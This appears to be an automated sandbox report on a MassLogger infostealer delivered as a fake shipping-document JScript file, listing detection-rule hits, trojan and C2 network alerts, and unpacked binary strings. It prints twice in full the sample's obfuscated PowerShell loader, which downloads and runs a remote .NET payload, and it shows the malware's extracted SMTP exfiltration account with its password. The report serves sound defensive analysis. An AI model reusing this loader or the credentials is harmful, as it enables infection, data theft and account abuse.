                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine|base64offset|contains: ., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", ProcessId: 7148, ProcessName: wscript.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49685
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", CommandLine|base64offset|contains: ., Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 496, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Documents SI 694_pdf.js", ProcessId: 7148, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fronts = 'JABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAA9ACAAJwAwAC8AUwA0AHgAUQBTAFYAWgB4AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMAIAA9ACAAJABhAGwAYgBpAGYAbABvAHIAbwB1AHMAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGMAbwB6AGkAbgBlAHMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbABvAHUAbgBnAGkAbgBnACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGwAbwB1AG4AZwBpAG4AZwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABNAGMASQBuAHQAaQByAGUAIAA9ACAAJABsAG8AdQBuAGcAaQBuAGcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYwBvAHoAaQBuAGUAcwBzACkAOwAkAG0AbwBuAG8AdAByAG8AcABpAHMAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAE0AYwBJAG4AdABpAHIAZQApADsAJAByAGUAYwBvAG0AZgBvAHIAdABsAGUAcwBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABuAG8AZABvAGkAZAAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAAPQAgACQAbQBvAG4AbwB0AHIAbwBwAGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAGMAbwBtAGYAbwByAHQAbABlAHMAcwApADsAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AZABvAGkAZAApADsAJAB1AG4AYwByAGUAYQB0AGkAdgBlACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAYgBlAG4AegBvAHQAaABpAGEAegBpAG4AZQBzACAALQBnAHQAIAAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAOwAkAHUAbgBjAHIAZQBhAHQAaQB2AGUAIAArAD0AIAAkAHIAZQBjAG8AbQBmAG8AcgB0AGwAZQBzAHMALgBMAGUAbgBnAHQAaAA7ACQASABhAHQAaABvAHIAIAA9ACAAJABiAGUAbgB6AG8AdABoAGkAYQB6AGkAbgBlAHMAIAAtACAAJAB1AG4AYwByAGUAYQB0AGkAdgBlADsAJAByAGUAdgBvAGwAdQB0AGkAbwBuAGkAegBlAGQAIAA9ACAAJABtAG8AbgBvAHQAcgBvAHAAaQBzAG0ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdQBuAGMAcgBlAGEAdABpAHYAZQAsACAAJABIAGEAdABoAG8AcgApADsAJABtAGUAbQBvAHIAYQBiAGwAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAZQB2AG8AbAB1AHQAaQBvAG4AaQB6AGUAZAApADsAJABjAHUAbAB0AHIAYQB0AGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAbQBlAG0AbwByAGEAYgBsAGUAbgBlAHMAcwApADsAJAByAGUAcwBpAHQAdQBhAHQAZQBzACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAbQB1AGwAdABpAGYAbABvAHIAbwB1AHMALAAnACcALAAnACcALAAnACcALAAnAE0AUwBCAHUAaQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$allocryptic = [System.Text.Encoding]::Unicode

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:09.806195+020020283713Unknown Traffic192.168.2.64968623.186.113.60443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:38.653437+020020576351A Network Trojan was detected23.186.113.60443192.168.2.649695TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:37.141219+020020490381A Network Trojan was detected207.241.233.30443192.168.2.649694TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:39.587683+020028032742Potentially Bad Traffic192.168.2.649696158.101.44.24280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:38.653437+020028582951A Network Trojan was detected23.186.113.60443192.168.2.649695TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-04-28T13:24:38.345893+020028410751Malware Command and Control Activity Detected192.168.2.64969523.186.113.60443TCP

                      Joe Sandbox Signatures

                      • AV Detection
                      • Location Tracking
                      • Exploits
                      • Compliance
                      • Software Vulnerabilities
                      • Networking
                      • Key, Mouse, Clipboard, Microphone and Screen Capturing
                      • System Summary
                      • Data Obfuscation
                      • Hooking and other Techniques for Hiding and Protection
                      • Malware Analysis System Evasion
                      • Anti Debugging
                      • HIPS / PFW / Operating System Protection Evasion
                      • Language, Device and Operating System Detection
                      • Stealing of Sensitive Information
                      • Remote Access Functionality

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "hee@dermypack.com.my", "Password": "Hee@123456789!", "Server": "mail.dermypack.com.my"}
                      Source: Shipping Documents SI 694_pdf.jsReversingLabs: Detection: 13%
                      Source: Submited SampleNeural Call Log Analysis: 99.9%

                      Location Tracking

                      barindex
                      Source: unknownDNS query: name: reallyfreegeoip.org

                      Exploits

                      barindex
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8aa30fb3d.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8aa250000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8aa250000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2f26c05.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.1e8a2e670c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                      Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49697 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49686 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 207.241.224.2:443 -> 192.168.2.6:49693 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 207.241.233.30:443 -> 192.168.2.6:49694 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.6:49695 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
                      Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 